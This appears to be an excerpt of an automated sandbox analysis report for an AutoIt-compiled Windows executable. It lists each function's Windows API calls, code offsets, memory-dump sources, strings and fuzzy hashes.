                                                                                            • Instruction Fuzzy Hash: D4F05E36005269BBDF129FA4BC0AFCE3F59AF16311F144201FA11625F187B856A2CBA5
                                                                                            APIs
                                                                                            • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 000FC84A
                                                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 000FC85D
                                                                                            • GetCurrentThreadId.KERNEL32 ref: 000FC864
                                                                                            • AttachThreadInput.USER32(00000000), ref: 000FC86B
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                            • String ID:
                                                                                            • API String ID: 2710830443-0
                                                                                            • Opcode ID: 3b993df9414b8d93a2bb62c24edc4e121f4baae096eb500ce9569d288afa1687
                                                                                            • Instruction ID: c3a731a5a848dd0a4c3ac6ef13a81f0e1a420f5d8b4b80fc11581fb301353427
                                                                                            • Opcode Fuzzy Hash: 3b993df9414b8d93a2bb62c24edc4e121f4baae096eb500ce9569d288afa1687
                                                                                            • Instruction Fuzzy Hash: 1BE0307514122C76EF201B61AC0DEDB7F5CEF067A1F418421B60D84860CA718581D7E0
                                                                                            APIs
                                                                                            • GetCurrentThread.KERNEL32 ref: 000FB0D6
                                                                                            • OpenThreadToken.ADVAPI32(00000000,?,?,?,000FAC9D), ref: 000FB0DD
                                                                                            • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,000FAC9D), ref: 000FB0EA
                                                                                            • OpenProcessToken.ADVAPI32(00000000,?,?,?,000FAC9D), ref: 000FB0F1
                                                                                            Similarity
                                                                                            • API ID: CurrentOpenProcessThreadToken
                                                                                            • String ID:
                                                                                            • API String ID: 3974789173-0
                                                                                            • Opcode ID: a8ef4a24c4eb46185591f2a5308574951f10ac7a448b2a829fba2a17c9ff0471
                                                                                            • Instruction ID: daee56eed4e083dddd8233ee528143ef283f8a9cba091da78430bb7d71f81d3c
                                                                                            • Opcode Fuzzy Hash: a8ef4a24c4eb46185591f2a5308574951f10ac7a448b2a829fba2a17c9ff0471
                                                                                            • Instruction Fuzzy Hash: 75E0867A7012119BDB601FB1AC0CB573BE8EF56795F018828F741D7460DF348481CB60
                                                                                            APIs
                                                                                            • GetSysColor.USER32(00000008), ref: 000DB496
                                                                                            • SetTextColor.GDI32(?,000000FF), ref: 000DB4A0
                                                                                            • SetBkMode.GDI32(?,00000001), ref: 000DB4B5
                                                                                            • GetStockObject.GDI32(00000005), ref: 000DB4BD
                                                                                            • GetWindowDC.USER32(?,00000000), ref: 0013DE2B
                                                                                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 0013DE38
                                                                                            • GetPixel.GDI32(00000000,?,00000000), ref: 0013DE51
                                                                                            • GetPixel.GDI32(00000000,00000000,?), ref: 0013DE6A
                                                                                            • GetPixel.GDI32(00000000,?,?), ref: 0013DE8A
                                                                                            • ReleaseDC.USER32(?,00000000), ref: 0013DE95
                                                                                            Similarity
                                                                                            • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                            • String ID:
                                                                                            • API String ID: 1946975507-0
                                                                                            • Opcode ID: 9eb0c35381729773bc6af7d1527b8719522a895b776d63b998b5c789dde32a51
                                                                                            • Instruction ID: c89c22f1139ba4c0529b2d89b075211d1a7a2b74a1b9d8a65306e81761f21769
                                                                                            • Opcode Fuzzy Hash: 9eb0c35381729773bc6af7d1527b8719522a895b776d63b998b5c789dde32a51
                                                                                            • Instruction Fuzzy Hash: 1BE0ED75100280AAEF215BB4BC09BD83F11AB56735F14C666FAAA580F2C7718581DB11
                                                                                            APIs
                                                                                            Similarity
                                                                                            • API ID: CapsDesktopDeviceReleaseWindow
                                                                                            • String ID:
                                                                                            • API String ID: 2889604237-0
                                                                                            • Opcode ID: 85100fcf2ab5e0587907fff43f542fe2b2432b98f3ee656aed963a8a95da0cfe
                                                                                            • Instruction ID: d8fef20d30d4f09f7070fa32bda690a9b58e59578c046935d550e95c920e6104
                                                                                            • Opcode Fuzzy Hash: 85100fcf2ab5e0587907fff43f542fe2b2432b98f3ee656aed963a8a95da0cfe
                                                                                            • Instruction Fuzzy Hash: CCE012B9100204EFDF015FB0A848A6EBBA8EB4C350F12880AF95A8B621DB7498818B50
                                                                                            APIs
                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 000FB2DF
                                                                                            • UnloadUserProfile.USERENV(?,?), ref: 000FB2EB
                                                                                            • CloseHandle.KERNEL32(?), ref: 000FB2F4
                                                                                            • CloseHandle.KERNEL32(?), ref: 000FB2FC
                                                                                              • Part of subcall function 000FAB24: GetProcessHeap.KERNEL32(00000000,?,000FA848), ref: 000FAB2B
                                                                                              • Part of subcall function 000FAB24: HeapFree.KERNEL32(00000000), ref: 000FAB32
                                                                                            Similarity
                                                                                            • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                            • String ID:
                                                                                            • API String ID: 146765662-0
                                                                                            • Opcode ID: 26c3608b54e1fc9c3d9802446dec975b7654c89a8f7403da8314106b8a2eb03d
                                                                                            • Instruction ID: 25d264843480c7b049f5a2a846f1b46476cfeaa23764eaae1e910012a745593f
                                                                                            • Opcode Fuzzy Hash: 26c3608b54e1fc9c3d9802446dec975b7654c89a8f7403da8314106b8a2eb03d
                                                                                            • Instruction Fuzzy Hash: 87E0BF7A104005BBCF022F95EC08859FBB6FF8A7213108221F61581975CB3294B1EB51
                                                                                            APIs
                                                                                            Similarity
                                                                                            • API ID: CapsDesktopDeviceReleaseWindow
                                                                                            • String ID:
                                                                                            • API String ID: 2889604237-0
                                                                                            • Opcode ID: 9d76a69fd68d3a2837ba35fdd992e15bb1fe5cb522dfe73787fae9f416e6e09f
                                                                                            • Instruction ID: b0e26956657271544ae2f8ed0d602481e5aaf0ee65c6c6a9531ee9931de1306a
                                                                                            • Opcode Fuzzy Hash: 9d76a69fd68d3a2837ba35fdd992e15bb1fe5cb522dfe73787fae9f416e6e09f
                                                                                            • Instruction Fuzzy Hash: C0E046B9500300EFDF019F70E84866DBBA8EB4D350F12880AF95A8B721CB7998818F10
                                                                                            APIs
                                                                                            • OleSetContainedObject.OLE32(?,00000001), ref: 000FDEAA
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: ContainedObject
                                                                                            • String ID: AutoIt3GUI$Container
                                                                                            • API String ID: 3565006973-3941886329
                                                                                            • Opcode ID: c0e8a55916e50ef7db372085f708fe99dce2fe3cd51f3c72df6fde7715fe9de9
                                                                                            • Instruction ID: c8d0927edb232004d7e369f778fb11cea95b41da9c49011b98d2a26ebd3e8615
                                                                                            • Opcode Fuzzy Hash: c0e8a55916e50ef7db372085f708fe99dce2fe3cd51f3c72df6fde7715fe9de9
                                                                                            • Instruction Fuzzy Hash: 02914670600605AFDB64DF64C884F6AB7FABF49710F20856EF94ACB691DB71E841CB60
                                                                                            APIs
                                                                                            • Sleep.KERNEL32(00000000), ref: 000DBCDA
                                                                                            • GlobalMemoryStatusEx.KERNEL32 ref: 000DBCF3
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: GlobalMemorySleepStatus
                                                                                            • String ID: @
                                                                                            • API String ID: 2783356886-2766056989
                                                                                            • Opcode ID: e640714f8c21c2e996a49709af10cc73bd2d19370555c21d56671fd36780077c
                                                                                            • Instruction ID: 5bd7cbbd8f158bfd210ef46d451d9de4bfb899c31f964f9b0791285383a3f106
                                                                                            • Opcode Fuzzy Hash: e640714f8c21c2e996a49709af10cc73bd2d19370555c21d56671fd36780077c
                                                                                            • Instruction Fuzzy Hash: 665137714187449BE320AF14DC86BAFBBE8FFA8354F41484EF5C8411A6DB7089A98766
                                                                                            APIs
                                                                                              • Part of subcall function 000C44ED: __fread_nolock.LIBCMT ref: 000C450B
                                                                                            • _wcscmp.LIBCMT ref: 0010C65D
                                                                                            • _wcscmp.LIBCMT ref: 0010C670
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: _wcscmp$__fread_nolock
                                                                                            • String ID: FILE
                                                                                            • API String ID: 4029003684-3121273764
                                                                                            • Opcode ID: 98d86ff89bf11a425fba7d0e49fbc27154fedd28a012cad27f9f0e07bfee9bb0
                                                                                            • Instruction ID: bc408da5e61b789019d1fe9349a62d164183f713fc6125c579fd8ae19e402d26
                                                                                            • Opcode Fuzzy Hash: 98d86ff89bf11a425fba7d0e49fbc27154fedd28a012cad27f9f0e07bfee9bb0
                                                                                            • Instruction Fuzzy Hash: CC41C672A0021ABBDF209BA4DC91FEF77B9AF49714F004469F645FB182D7B19A04CB91
                                                                                            APIs
                                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 0012A85A
                                                                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0012A86F
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: MessageSend
                                                                                            • String ID: '
                                                                                            • API String ID: 3850602802-1997036262
                                                                                            • Opcode ID: d1560c19190e070828aa17c06a918c6bc4cf9791e840fe404ae740ebaaff2316
                                                                                            • Instruction ID: b96e4fa538030fda7c986d0d032262779640f8fa1ac40a42a3e4b019d8614173
                                                                                            • Opcode Fuzzy Hash: d1560c19190e070828aa17c06a918c6bc4cf9791e840fe404ae740ebaaff2316
                                                                                            • Instruction Fuzzy Hash: 22410775E01319AFDB14CFA8D880BDA7BB9FF08300F51006AE905AB381D771A952CFA5
                                                                                            APIs
                                                                                            • _memset.LIBCMT ref: 00115190
                                                                                            • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 001151C6
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Similarity
                                                                                            • API ID: CrackInternet_memset
                                                                                            • String ID: |
                                                                                            • API String ID: 1413715105-2343686810
                                                                                            • Opcode ID: 83e9772896ba005ace1b84d678cd1149c72c2c06d743d11dc4c536b34d73789b
                                                                                            • Instruction ID: d53ddcd50ddeb55193533fc40cf52118c3ed65c1d86ef2524d45614d39212a82
                                                                                            • Opcode Fuzzy Hash: 83e9772896ba005ace1b84d678cd1149c72c2c06d743d11dc4c536b34d73789b
                                                                                            • Instruction Fuzzy Hash: E8311971800119EBDF15EFA4CC85EEE7FB9FF54700F100029F919A6166DB31A946DBA0
                                                                                            APIs
                                                                                            • DestroyWindow.USER32(?,?,?,?), ref: 0012980E
                                                                                            • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0012984A
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: Window$DestroyMove
                                                                                            • String ID: static
                                                                                            • API String ID: 2139405536-2160076837
                                                                                            • Opcode ID: 7452ed9ad8a48c41f085ce8672eb50351ff8034aa1ec3808a5c18befd084475a
                                                                                            • Instruction ID: 5764348339c518e7475f248baeede278a45d64ef870b44bff12f18a40f3b3a7e
                                                                                            • Opcode Fuzzy Hash: 7452ed9ad8a48c41f085ce8672eb50351ff8034aa1ec3808a5c18befd084475a
                                                                                            • Instruction Fuzzy Hash: D8317E71110618AEEB109F78DC81BFB73A9FF59760F148619F8A9C7190DB31AC91DB60
                                                                                            APIs
                                                                                            • _memset.LIBCMT ref: 001051C6
                                                                                            • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00105201
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: InfoItemMenu_memset
                                                                                            • String ID: 0
                                                                                            • API String ID: 2223754486-4108050209
                                                                                            • Opcode ID: 00a7f297b9c9be5fbfcaf8e8dbdc8133553d0edbb314eaf0113625138f285a25
                                                                                            • Instruction ID: 0f5afe6ff7b90224926fede6ac9b74b43fc76ae3a9d9afdd820f0a420fdce98d
                                                                                            • Opcode Fuzzy Hash: 00a7f297b9c9be5fbfcaf8e8dbdc8133553d0edbb314eaf0113625138f285a25
                                                                                            • Instruction Fuzzy Hash: D9318F31A00705EBEB24CF99D845BAFBBBAAF45354F144419E9C6A61E1D7F09A84CF10
                                                                                            APIs
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: __snwprintf
                                                                                            • String ID: , $$AUTOITCALLVARIABLE%d
                                                                                            • API String ID: 2391506597-2584243854
                                                                                            • Opcode ID: 357d4d50d997148253e6bfee17323109b87b2341421ecf7a4c4308f4862d60b2
                                                                                            • Instruction ID: 405c749f5afb2c9f692c81b963023aba9f24fcedfa36f535091796227885c8e8
                                                                                            • Opcode Fuzzy Hash: 357d4d50d997148253e6bfee17323109b87b2341421ecf7a4c4308f4862d60b2
                                                                                            • Instruction Fuzzy Hash: 7C218D71600218AFCF24EFA4CC82FEE73B5AF45340F054469F509AB182DB71EA85DBA1
                                                                                            APIs
                                                                                            • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0012945C
                                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00129467
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: MessageSend
                                                                                            • String ID: Combobox
                                                                                            • API String ID: 3850602802-2096851135
                                                                                            • Opcode ID: f237cb6669691c49c7be6df5515c866c4dc96248075cb429ff741eb9cbc4b1db
                                                                                            • Instruction ID: 49704c82c1ad580496bf0d9f1ecda5e53f8724bdd2c48c534bfd75794177dbba
                                                                                            • Opcode Fuzzy Hash: f237cb6669691c49c7be6df5515c866c4dc96248075cb429ff741eb9cbc4b1db
                                                                                            • Instruction Fuzzy Hash: 1D11B2B1300218BFEF25DE68EC80EFB376EEB483A4F114125F959972A0D7719C628760
                                                                                            APIs
                                                                                              • Part of subcall function 000DD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 000DD1BA
                                                                                              • Part of subcall function 000DD17C: GetStockObject.GDI32(00000011), ref: 000DD1CE
                                                                                              • Part of subcall function 000DD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 000DD1D8
                                                                                            • GetWindowRect.USER32(00000000,?), ref: 00129968
                                                                                            • GetSysColor.USER32(00000012), ref: 00129982
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                            • String ID: static
                                                                                            • API String ID: 1983116058-2160076837
                                                                                            • Opcode ID: a2403b4b4d674ac85797cb11b1065308cab177ee422db0eed8b2f87e70953845
                                                                                            • Instruction ID: 33a5e721c010b62f6eeb326595eab4a1b8784bc59e89e87dda453f2a1f8b2ce9
                                                                                            • Opcode Fuzzy Hash: a2403b4b4d674ac85797cb11b1065308cab177ee422db0eed8b2f87e70953845
                                                                                            • Instruction Fuzzy Hash: 1911297251021AAFDF04DFB8DC45AEA7BB8FB08354F054619F955D2250E734E861DB60
                                                                                            APIs
                                                                                            • GetWindowTextLengthW.USER32(00000000), ref: 00129699
                                                                                            • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 001296A8
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: LengthMessageSendTextWindow
                                                                                            • String ID: edit
                                                                                            • API String ID: 2978978980-2167791130
                                                                                            • Opcode ID: 6611edb522b9fa35b782dae11ab60e257eb3e8dae170e23f3c4e0d06b73259ff
                                                                                            • Instruction ID: 69e7d63f09417e37cbc4b9ca0a0c7e7ede9d0a9f7c65e59186c7180e226ea90e
                                                                                            • Opcode Fuzzy Hash: 6611edb522b9fa35b782dae11ab60e257eb3e8dae170e23f3c4e0d06b73259ff
                                                                                            • Instruction Fuzzy Hash: 42118C71500218AFEF205FA8EC44EEB3BAAEB05378F504714F965971E0C775DCA19760
                                                                                            APIs
                                                                                            • _memset.LIBCMT ref: 001052D5
                                                                                            • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 001052F4
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: InfoItemMenu_memset
                                                                                            • String ID: 0
                                                                                            • API String ID: 2223754486-4108050209
                                                                                            • Opcode ID: 1e86b38588c9af96d444546c6f2445c39d9e2ad1963073bef9610acf5d02b19e
                                                                                            • Instruction ID: 519208de5d4a13e5cde484937fe221bce9a5c20bd7097056efd0ac32a01b05e9
                                                                                            • Opcode Fuzzy Hash: 1e86b38588c9af96d444546c6f2445c39d9e2ad1963073bef9610acf5d02b19e
                                                                                            • Instruction Fuzzy Hash: 0811D076901614EBEB24DA98DD05B9E77BABB06750F150025F981AB2E0D3F0AE05CF90
                                                                                            APIs
                                                                                            • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00114DF5
                                                                                            • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00114E1E
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: Internet$OpenOption
                                                                                            • String ID: <local>
                                                                                            • API String ID: 942729171-4266983199
                                                                                            • Opcode ID: c613f53bbfe3e8ac185a31d4a05d8f3135b7c2df8c51db089982c754f5ccccc6
                                                                                            • Instruction ID: 6e8ff014db483f2fb550d726173e55eff621e661536f2e300d57003dc4f23dde
                                                                                            • Opcode Fuzzy Hash: c613f53bbfe3e8ac185a31d4a05d8f3135b7c2df8c51db089982c754f5ccccc6
                                                                                            • Instruction Fuzzy Hash: 6A11A070601221BBDF2D8FA1D888EFBFAA8FF26B65F10823AF51556140D37059C1C6E0
                                                                                            APIs
                                                                                            • inet_addr.WSOCK32(00000000), ref: 0011A84E
                                                                                            • htons.WSOCK32(00000000), ref: 0011A88B
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: htonsinet_addr
                                                                                            • String ID: 255.255.255.255
                                                                                            • API String ID: 3832099526-2422070025
                                                                                            APIs
                                                                                            • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 000FB7EF
                                                                                            Similarity
                                                                                            • API ID: MessageSend
                                                                                            • String ID: ComboBox$ListBox
                                                                                            • API String ID: 3850602802-1403004172
                                                                                            APIs
                                                                                            • SendMessageW.USER32(?,00000180,00000000,?), ref: 000FB6EB
                                                                                            Similarity
                                                                                            • API ID: MessageSend
                                                                                            • String ID: ComboBox$ListBox
                                                                                            • API String ID: 3850602802-1403004172
                                                                                            APIs
                                                                                            • SendMessageW.USER32(?,00000182,?,00000000), ref: 000FB76C
                                                                                            Similarity
                                                                                            • API ID: MessageSend
                                                                                            • String ID: ComboBox$ListBox
                                                                                            • API String ID: 3850602802-1403004172
                                                                                            APIs
                                                                                            Similarity
                                                                                            • API ID: ClassName_wcscmp
                                                                                            • String ID: #32770
                                                                                            • API String ID: 2292705959-463685578
                                                                                            APIs
                                                                                            • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 000FA63F
                                                                                              • Part of subcall function 000E13F1: _doexit.LIBCMT ref: 000E13FB
                                                                                            Similarity
                                                                                            • API ID: Message_doexit
                                                                                            • String ID: AutoIt$Error allocating memory.
                                                                                            • API String ID: 1993061046-4017498283
                                                                                            APIs
                                                                                            • GetSystemDirectoryW.KERNEL32(?), ref: 0013ACC0
                                                                                            • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0013AEBD
                                                                                            Similarity
                                                                                            • API ID: DirectoryFreeLibrarySystem
                                                                                            • String ID: WIN_XPe
                                                                                            • API String ID: 510247158-3257408948
                                                                                            APIs
                                                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 001286A2
                                                                                            • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 001286B5
                                                                                              • Part of subcall function 00107A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00107AD0
                                                                                            Similarity
                                                                                            • API ID: FindMessagePostSleepWindow
                                                                                            • String ID: Shell_TrayWnd
                                                                                            • API String ID: 529655941-2988720461
                                                                                            APIs
                                                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 001286E2
                                                                                            • PostMessageW.USER32(00000000), ref: 001286E9
                                                                                              • Part of subcall function 00107A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00107AD0
                                                                                            Similarity
                                                                                            • API ID: FindMessagePostSleepWindow
                                                                                            • String ID: Shell_TrayWnd
                                                                                            • API String ID: 529655941-2988720461